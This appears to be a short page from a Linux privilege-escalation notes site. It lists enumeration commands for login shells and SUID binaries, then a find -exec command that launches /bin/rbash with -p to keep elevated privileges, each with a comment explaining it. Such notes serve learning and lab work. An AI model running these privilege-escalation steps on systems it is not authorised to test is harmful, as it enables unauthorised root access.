shells

cat /etc/shells
# Displays the list of available login shells on the system.

cat /etc/shells | while read shell; do ls -l $shell 2>/dev/null; done
# Reads each shell listed in /etc/shells and checks its file permissions using ls -l. Errors (e.g., non-existing files) are redirected to /dev/null to avoid clutter.

find / -perm -4000 2>/dev/null
# Searches the entire filesystem (/) for SUID binaries (files with the set-user-ID bit enabled). Errors (e.g., permission denied) are suppressed by redirecting them to /dev/null.


find / -exec /bin/rbash -p \; -quit
# Searches the entire filesystem (/) and executes /bin/rbash (a restricted shell) with the -p flag, which prevents privilege reduction. The -quit ensures that the command stops after the first match is found and executed.

I started by listing all available login shells on the system using cat /etc/shells. Then, I iterated over each shell path and checked its permissions using ls -l, ensuring that errors were suppressed.

Next, I searched the system for SUID binaries using find / -perm -4000, which can help identify files that run with elevated privileges. Finally, I attempted to execute /bin/rbash with elevated privileges using find -exec, allowing me to see if a restricted shell could be invoked without privilege reduction.

PreviousExploiting SUID Binaries NextFile Permissions

Last updated 11 months ago